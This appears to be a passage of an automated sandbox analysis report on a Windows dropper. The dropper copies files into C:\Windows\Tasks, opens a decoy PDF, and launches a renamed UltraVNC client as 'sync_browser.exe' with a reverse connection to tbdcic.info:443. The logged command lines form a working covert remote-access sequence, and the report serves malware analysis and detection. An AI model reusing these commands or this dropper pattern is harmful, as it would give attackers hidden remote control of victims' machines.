                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeCode function: 0_2_00408DBF wvsprintfW,GetLastError,FormatMessageW,FormatMessageW,FormatMessageW,lstrlenW,lstrlenW,lstrlenW,??2@YAPAXI@Z,lstrcpyW,lstrcpyW,lstrcpyW,??3@YAXPAX@Z,LocalFree,0_2_00408DBF
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E5083550 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetVersionExA,ExitWindowsEx,23_2_00007FF7E5083550
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E50818A0 GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,CloseHandle,23_2_00007FF7E50818A0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E50834B0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,23_2_00007FF7E50834B0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E5083550 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetVersionExA,ExitWindowsEx,26_2_00007FF7E5083550
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E50818A0 GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,CloseHandle,26_2_00007FF7E50818A0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E50834B0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,26_2_00007FF7E50834B0
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeCode function: 0_2_004011D1 GetDiskFreeSpaceExW,SendMessageW,0_2_004011D1
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: OpenSCManagerA,CreateServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,23_2_00007FF7E5082D00
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: OpenSCManagerA,CreateServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,26_2_00007FF7E5082D00
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E50D9BC0 LoadLibraryA,GetProcAddress,GetProcAddress,GetSystemMetrics,GetCurrentProcessId,ProcessIdToSessionId,CreateToolhelp32Snapshot,Process32First,CloseHandle,FreeLibrary,ProcessIdToSessionId,ProcessIdToSessionId,CloseHandle,FreeLibrary,Process32Next,23_2_00007FF7E50D9BC0
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeCode function: 0_2_0040385E _wtol,_wtol,SHGetSpecialFolderPathW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,_wtol,CoCreateInstance,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,0_2_0040385E
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeCode function: 0_2_00401DC9 GetModuleHandleW,FindResourceExA,FindResourceExA,FindResourceExA,SizeofResource,LoadResource,LockResource,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,wsprintfW,LoadLibraryA,GetProcAddress,0_2_00401DC9
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\Downloads\Lom.pdfJump to behavior
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4236:120:WilError_03
                          Source: C:\Windows\Tasks\sync_browser.exeMutant created: \Sessions\1\BaseNamedObjects\WinVNC_Win32_Instance_Mutex
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6504:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2980:120:WilError_03
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeFile created: C:\Users\user~1\AppData\Local\Temp\7ZipSfx.000Jump to behavior
                          Source: Olz7TmvkEW.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "sync_browser.exe")
                          Source: C:\Windows\SysWOW64\timeout.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "sync_browser.exe")
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                          Source: sync_browser.exeString found in binary or memory: -startservice
                          Source: sync_browser.exeString found in binary or memory: -install
                          Source: sync_browser.exeString found in binary or memory: -stopservice
                          Source: sync_browser.exeString found in binary or memory: -startservice
                          Source: sync_browser.exeString found in binary or memory: -install
                          Source: sync_browser.exeString found in binary or memory: -stopservice
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeFile read: C:\Users\user\Desktop\Olz7TmvkEW.exeJump to behavior
                          Source: unknownProcess created: C:\Users\user\Desktop\Olz7TmvkEW.exe "C:\Users\user\Desktop\Olz7TmvkEW.exe"
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\"
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & copy 5482310161066753 5482310161066753.cmd
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & 5482310161066753.cmd
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 1
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\Lom.pdf"
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 1
                          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im sync_browser.exe
                          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2096 --field-trial-handle=1620,i,1244757786394312861,11570424180585682022,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 1
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\Tasks\sync_browser.exe C:\Windows\Tasks\sync_browser.exe
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 8
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\Tasks\sync_browser.exe C:\Windows\Tasks\sync_browser.exe -autoreconnect -id:user-PC_Thj0Wf -connect tbdcic.info:443
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 4
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 42
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 42
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 42
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 42
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\"Jump to behavior
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & copy 5482310161066753 5482310161066753.cmdJump to behavior
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & 5482310161066753.cmdJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 1Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\Lom.pdf"Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 1Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im sync_browser.exeJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 2Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 1Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im sync_browser.exeJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\Tasks\sync_browser.exe C:\Windows\Tasks\sync_browser.exeJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 8Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\Tasks\sync_browser.exe C:\Windows\Tasks\sync_browser.exe -autoreconnect -id:user-PC_Thj0Wf -connect tbdcic.info:443Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 2Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 4Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 42Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 42Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 42Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 42Jump to behavior
                          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215Jump to behavior
                          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2096 --field-trial-handle=1620,i,1244757786394312861,11570424180585682022,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8Jump to behavior
                          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: policymanager.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: msvcp110_win.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: pcacli.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mpr.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc_os.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dllJump to behavior
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dllJump to behavior
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dllJump to behavior
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dllJump to behavior
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                          Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                          Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: apphelp.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: winmm.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: version.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: userenv.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: wtsapi32.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: dwmapi.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: sspicli.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: winsta.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: napinsp.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: pnrpnsp.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: wshbth.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: nlaapi.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: iphlpapi.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: mswsock.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: dnsapi.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: winrnr.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: wldp.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: riched32.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: riched20.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: usp10.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: msls31.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: riched32.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: riched20.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: usp10.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: msls31.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: riched32.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: riched20.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: usp10.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: msls31.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: riched32.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: riched20.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: usp10.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: msls31.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: riched32.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: riched20.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: usp10.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: msls31.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: riched32.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: riched20.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: usp10.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: msls31.dll
                          Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: winmm.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: version.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: userenv.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: wtsapi32.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: dwmapi.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: napinsp.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: pnrpnsp.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: wshbth.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: nlaapi.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: iphlpapi.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: mswsock.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: dnsapi.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: winrnr.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: fwpuclnt.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: rasadhlp.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                          Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                          Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                          Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                          Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                          Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                          Source: C:\Windows\SysWOW64\cmd.exeFile written: C:\Windows\Tasks\UltraVNC.iniJump to behavior
                          Source: C:\Windows\Tasks\sync_browser.exeFile opened: C:\Windows\SYSTEM32\RICHED32.DLL
                          Source: Window RecorderWindow detected: More than 3 window changes detected
                          Source: Olz7TmvkEW.exeStatic file information: File size 1641047 > 1048576
                          Source: Binary string: conhost.pdbUGP source: Olz7TmvkEW.exe, 00000000.00000003.1297167688.000000000273D000.00000004.00000020.00020000.00000000.sdmp, sdABZ4.E1924R.2.dr, sdABZ4.E1924R.0.dr, conhost.exe.6.dr
                          Source: Binary string: conhost.pdb source: Olz7TmvkEW.exe, 00000000.00000003.1297167688.000000000273D000.00000004.00000020.00020000.00000000.sdmp, sdABZ4.E1924R.2.dr, sdABZ4.E1924R.0.dr, conhost.exe.6.dr
                          Source: sdABZ4.E1924R.0.drStatic PE information: 0x998FF43F [Tue Aug 22 20:17:03 2051 UTC]
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeCode function: 0_2_0040236F LoadLibraryA,GetProcAddress,GetNativeSystemInfo,0_2_0040236F
                          Source: Olz7TmvkEW.exeStatic PE information: real checksum: 0x2af97 should be: 0x198e1b
                          Source: sdABZ4.E1924R.0.drStatic PE information: section name: .didat
                          Source: sdABZ4.E1924R.2.drStatic PE information: section name: .didat
                          Source: conhost.exe.6.drStatic PE information: section name: .didat
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeCode function: 0_2_00413660 push eax; ret 0_2_0041368E
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E507FEF1 push rcx; ret 23_2_00007FF7E507FEF2
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E50907F8 push rbp; iretd 23_2_00007FF7E50907F9
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E50912EF push rbp; iretd 23_2_00007FF7E50912F0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E508DC21 push rsp; ret 23_2_00007FF7E508DC23
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E50A8CF9 push 8B481074h; iretd 23_2_00007FF7E50A8CFF
